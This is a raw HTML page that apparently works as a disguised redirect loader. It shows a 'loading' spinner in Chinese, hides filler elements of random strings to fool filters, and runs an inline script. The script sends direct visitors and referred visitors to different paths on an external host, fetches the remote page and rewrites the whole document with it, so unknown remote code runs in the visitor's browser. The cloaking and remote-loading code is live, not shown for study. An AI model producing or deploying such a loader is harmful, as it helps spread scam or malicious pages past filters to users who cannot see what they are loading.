<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zfbTuxz3yEb {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zfbTuxz3yEb .AwBa9dG0vdk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zfbTuxz3yEb .content {
            line-height: 50px;
            text-align: center
        }

        .zfbTuxz3yEb .img {
            width: 100%
        }

        .zfbTuxz3yEb .otrJs2Voy {
            text-align: center
        }

        .zfbTuxz3yEb .otrJs2Voy span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zfbTuxz3yEb .otrJs2Voy span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zfbTuxz3yEb .otrJs2Voy span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zfbTuxz3yEb .otrJs2Voy span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zfbTuxz3yEb .otrJs2Voy span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zfbTuxz3yEb .otrJs2Voy span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zfbTuxz3yEb .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function db5UzE47fB69(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var UR0CB = db5UzE47fB69('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ UR0CB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ UR0CB +".html?a=share";
		}
		
        bhC3Z3K2X6=url+"#"+new Date().getTime();
        bhC3Z3K2X6 && function() {
            $.get(bhC3Z3K2X6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>OE2nvpveMY7NX8PcJIB97G2nIg9sljSBu95pEQRhShna3WO</p>
<h1 style='display:none' >kyVZhIxVIibH3w</h1>
<span style='display:none'>kN8Rnmco5tB</span>
<span style='display:none'>kN8Rnmco5tB</span><div class="zfbTuxz3yEb">
    <div class="AwBa9dG0vdk">
        <div class="otrJs2Voy">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >Pss1sIMtMJJFBEWRkx7eXfZKByEXR8mEYL1BXzquEGDFKdaUmcT</li>
<h1 style='display:none' >Fr30mdF5uBZWOP0nCUsFraHYnAUpWOkctGhckeMGQVUglXyJaMlLefX</h1>
<ul style='display:none' >Kg2iE5sskXnIYeEkSgol9bMmrCtid7m3yaxVX3gNhA8cg1SqA6J8AysGrEWKI128NerTajYCdku97mH6Z6m7cgd3AKI</ul>
<h1 style='display:none' >Fr30mdF5uBZWOP0nCUsFraHYnAUpWOkctGhckeMGQVUglXyJaMlLefX</h1></body>
</html>